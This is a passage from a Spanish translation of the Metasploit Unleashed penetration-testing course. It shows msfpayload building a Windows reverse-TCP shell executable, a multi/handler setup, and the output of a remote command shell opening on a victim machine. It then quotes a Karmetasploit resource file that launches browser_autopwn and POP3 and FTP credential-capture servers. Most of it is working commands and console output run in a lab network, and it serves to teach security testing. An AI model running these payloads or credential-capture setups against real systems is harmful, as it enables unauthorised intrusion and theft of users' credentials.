Connect back to attacker and spawn a command shell

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 287
Options: LHOST=172.16.104.130,LPORT=31337

root@bt:/pentest/exploits/framework3# file /tmp/1.exe

/tmp/1.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit


Ok, vemos que tenemos listo el ejecutable de Windows. Ahora, vamos a usar "multi/handler" que es un manejador que se encarga de lanzar fuera del framework el exploit.

root@bt4:/pentest/exploits/framework3# ./msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##


=[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 371 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 149 aux

msf > use exploit/multi/handler
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Wildcard Target


Cuando utilizamos el modulo "exploit/multi/handler", todavia necesitamos decirle cual payload usar, asi que lo configuramos con la misma configuracion que el ejecutable que generamos.

msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) >


Ahora que tenemos todo configurado y listo para salir, usamos "exploit" en el multi/handler y ejecutamos nuestro ejecutable generado en la victima. El multi/handler se encarga del exploit por nosotros y nos muestra la shell.

msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Jim\My Documents>




© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Metasploit Unleashed en Espanol (16.2/18)

20.2.10

Recursos

Un recurso es simplemente un archivo de texto separada por lineas que contiene una secuencia de comandos para ser ejecutados en msfconsole. Uno de los recuros mas notables es Karmetasploit el archivo "karma.rc". Hechemos una breve mirada dentro de este archivo para tener una idea del contenido de un recurso.

<>load db_sqlite3
db_create /root/karma.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run



use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run

use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run

use auxiliary/server/capture/ftp
run

Como podemos ver, pasar un archivo como recurso para Metasploit permite tener una gran automatizacion. Puede configurar cualquier opcion y usar cualquier modulo con Metasploit usando un recurso y todos los comandos seran ejecutados en secuencia.

Hay dos metodos para cargar un archivo como recurso en Metasploit. Pueden ser pasados como opcion al msfconsole en la linea de comando usando el interruptor "-r" o puede ser cargado desde msfconsole usando el comando "resource".

root@bt4:/pentest/exploits/framework3# ./msfconsole -r karma.rc

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / _|/ _|/ / _| |
| | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
/|
|


=[ msf v3.3-dev
+ -- --=[ 372 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 149 aux


resource> load db_sqlite3


msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db



© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Creative Commons License
Esta obra está bajo una licencia de Creative Commons.